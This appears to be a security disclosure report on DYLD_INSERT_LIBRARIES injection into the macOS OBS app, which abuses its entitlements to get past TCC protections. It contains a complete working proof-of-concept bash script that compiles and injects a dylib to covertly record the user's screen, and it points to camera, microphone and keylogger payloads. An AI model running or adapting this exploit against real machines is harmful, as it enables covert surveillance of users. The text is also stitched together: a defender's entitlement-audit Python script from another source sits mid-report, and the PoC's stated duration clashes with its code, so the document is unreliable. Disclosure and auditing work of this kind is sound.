Hi!
Please find here my report of the fact that attackers could abuse the macOS OBS software to access resources such as the camera or microphone otherwise protected by TCC, because OBS allows loading arbitrary libraries. As I couldn't find any other place to send this information privately, I'm posting it here (if this is not the right place, please let me know):
# Context
In macOS a process is considered a security boundary. This is why macOS implements several defense mechanisms that prevent even processes from the same user (or from root) from injecting code into a different process.
This is done because executables can hold extra permissions via entitlements or can handle sensitive information in their memory.
However, it was found that the `OBS` macOS application is vulnerable to library injection.
# Library Injection
It was found that the `OBS` application has the entitlements `com.apple.security.cs.disable-library-validation` and `com.apple.security.cs.allow-dyld-environment-variables`.
Together, those entitlements disable the validation of libraries loaded by the application and allow a user to set the environment variable `DYLD_INSERT_LIBRARIES` to any library on the filesystem, which dyld then loads into the process. This effectively allows arbitrary code execution inside the `OBS` process.
For more information about Library Validation and Library Injection check https://book.hacktricks.xyz/macos-h...on/macos-proces-abuse/macos-library-injection
# Impact
The `OBS` application has some privileged entitlements:
- `com.apple.security.device.audio-input` - Grants access to the microphone
- `com.apple.security.device.camera` - Grants access to the camera
This means that an attacker could inject code into the `OBS` application and abuse those entitlements to access the user's sensitive information.
Moreover, when started, OBS requests access to `Accessibility` and `Screen Recording`. This means that an attacker could inject code into the `OBS` application and abuse those privileges as well.
Note that access to those resources might prompt a dialog asking the user for permission. However, the user might not suspect that the application requesting access is `OBS` and may grant it. And if the user has already used `OBS` before, those permissions may already have been granted to `OBS`, in which case the dialog won't be shown again.
Moreover, a malicious application could also abuse the code injection to make `OBS` request access to other TCC-protected resources like Desktop or Documents, so the user doesn't suspect anything, and then abuse the access granted to `OBS` to reach those resources.
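The risky combination described in the two sections above (library validation disabled plus DYLD environment variables allowed, on a binary that also holds device entitlements) can be audited from an app's embedded entitlements. The following is an added example for defenders, not code from the report or from OBS; it assumes `codesign -d --entitlements :- <path>` prints the entitlements as an XML plist, and the two embedded plists are constructed samples, not dumps of the real binary:

```python
import plistlib
import subprocess

# The two hardened-runtime opt-outs that, together, let dyld honour
# DYLD_INSERT_LIBRARIES for a signed app (the combination the report describes).
INJECTION_ENTITLEMENTS = {
    "com.apple.security.cs.disable-library-validation",
    "com.apple.security.cs.allow-dyld-environment-variables",
}
# Device entitlements an injected library would inherit from the host process.
SENSITIVE_ENTITLEMENTS = {
    "com.apple.security.device.audio-input": "microphone",
    "com.apple.security.device.camera": "camera",
}

def assess_entitlements(plist_xml: bytes) -> dict:
    """Classify an entitlements plist (XML bytes) by injection and TCC exposure."""
    granted = {k for k, v in plistlib.loads(plist_xml).items() if v is True}
    injectable = INJECTION_ENTITLEMENTS <= granted
    exposed = sorted(SENSITIVE_ENTITLEMENTS[k] for k in granted & SENSITIVE_ENTITLEMENTS.keys())
    return {"injectable": injectable, "exposed": exposed, "risky": injectable and bool(exposed)}

def assess_binary(path: str) -> dict:
    """macOS only: dump the embedded entitlements with codesign and assess them (assumed CLI form)."""
    xml = subprocess.run(["codesign", "-d", "--entitlements", ":-", path],
                         capture_output=True, check=True).stdout
    return assess_entitlements(xml)

# Constructed sample mirroring the four entitlements the report lists for OBS.
SAMPLE_OBS_LIKE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>com.apple.security.cs.disable-library-validation</key><true/>
  <key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
  <key>com.apple.security.device.audio-input</key><true/>
  <key>com.apple.security.device.camera</key><true/>
</dict></plist>"""

# Constructed sample of a similar app that keeps library validation enabled.
SAMPLE_HARDENED = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
  <key>com.apple.security.device.camera</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, blob in (("obs-like", SAMPLE_OBS_LIKE), ("hardened", SAMPLE_HARDENED)):
        print(name, assess_entitlements(blob))
```

Running `assess_binary` over every Mach-O under `/Applications/*.app/Contents/MacOS` gives a quick inventory of apps on a fleet that share this exposure.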
# Other CVEs
These other CVEs were assigned to apps with the same vulnerability:
- https://wojciechregula.blog/post/how-to-rob-a-firefox/
- https://github.com/Zeyad-Azima/CVE-2023-26818
# PoC
This PoC compiles a library and injects it into the OBS app; the library records the screen to a 3s video. It writes some logs to `/tmp/logs.txt` to confirm that the code was executed. The recording is stored in `/tmp/screen.mov`.
Note that even though this PoC only records the screen, other PoCs that access the remaining resources, such as the microphone or the camera, can be found at https://book.hacktricks.xyz/macos-h...rity-protections/macos-tcc/macos-tcc-payloads
```bash
#!/bin/bash
rm -rf /tmp/screen.mov
pkill OBS
cat > /tmp/inject.m <<EOF
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
#import <CoreGraphics/CoreGraphics.h>

// Delegate that is notified when the movie file output finishes writing.
@interface MyRecordingDelegate : NSObject <AVCaptureFileOutputRecordingDelegate>
@end

@implementation MyRecordingDelegate
- (void)captureOutput:(AVCaptureFileOutput *)output
didFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL
      fromConnections:(NSArray *)connections
                error:(NSError *)error {
    if (error) {
        NSLog(@"Recording error: %@", error);
    } else {
        NSLog(@"Recording finished successfully.");
    }
    exit(0);
}
@end

// Runs automatically when dyld loads the library into the host process.
__attribute__((constructor))
void myconstructor(int argc, const char **argv) {
    freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr (NSLog) to /tmp/logs.txt

    AVCaptureSession *captureSession = [[AVCaptureSession alloc] init];
    AVCaptureScreenInput *screenInput = [[AVCaptureScreenInput alloc] initWithDisplayID:CGMainDisplayID()];
    if ([captureSession canAddInput:screenInput]) {
        [captureSession addInput:screenInput];
    }
    AVCaptureMovieFileOutput *fileOutput = [[AVCaptureMovieFileOutput alloc] init];
    if ([captureSession canAddOutput:fileOutput]) {
        [captureSession addOutput:fileOutput];
    }
    [captureSession startRunning];

    MyRecordingDelegate *delegate = [[MyRecordingDelegate alloc] init];
    [fileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"/tmp/screen.mov"] recordingDelegate:delegate];

    // Stop the recording after 5 seconds; the delegate then exits the process.
    dispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(5 * NSEC_PER_SEC)), dispatch_get_main_queue(), ^{
        [fileOutput stopRecording];
    });
    CFRunLoopRun();
}
EOF
gcc -dynamiclib -framework Foundation -framework AVFoundation -framework CoreVideo -framework CoreMedia -framework CoreGraphics -o /tmp/inject.dylib /tmp/inject.m
open --env "DYLD_INSERT_LIBRARIES=/tmp/inject.dylib" -a "OBS"
```
The same injection could also be used to run a keylogger.
# Other vulnerable binaries
The following `OBS` binaries are also vulnerable to the same issue:
- /Applications/OBS.app/Contents/MacOS/obs-ffmpeg-mux
# Disclaimer
This proposed vulnerability is part of research that may be presented at one or more cybersecurity conferences.